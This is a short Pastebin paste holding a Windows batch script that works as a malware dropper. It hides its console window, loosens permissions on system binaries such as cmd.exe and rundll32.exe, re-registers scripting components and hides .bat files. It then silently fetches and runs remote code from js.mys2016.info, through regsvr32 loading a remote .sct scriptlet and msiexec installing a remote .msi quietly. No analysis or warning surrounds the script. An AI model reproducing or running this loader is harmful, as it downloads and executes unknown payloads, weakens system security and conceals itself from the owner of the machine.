Advertisement
Guest User

Untitled

a guest
Jul 10th, 2017
97
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. @echo off
  2. mode con: cols=13 lines=1
  3. cacls C:\Progra~1\Common~1\System\ado\msado15.dll /e /g system:f&cacls C:\windows\system32\cacls.exe /e /g system:f&cacls C:\windows\system32\cmd.exe /e /g system:f&cacls C:\windows\system32\ftp.exe /e /g system:f&cacls C:\windows\system32\rundll32.exe /e /g everyone:f
  4. taskkill /f /im regsvr32.exe&taskkill /f /im rundll32.exe
  5. regsvr32 /s c:\Progra~1\Common~1\System\Ado\Msado15.dll&regsvr32 /s jscript.dll&regsvr32 /s vbscript.dll&regsvr32 /s scrrun.dll&regsvr32 /s WSHom.Ocx&regsvr32 /s shell32.dll
  6. attrib +s +h *.bat
  7. start regsvr32 /u /s /i:http://js.mys2016.info:280/v.sct scrobj.dll
  8. start msiexec.exe /i http://js.mys2016.info:280/helloworld.msi /q
  9. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement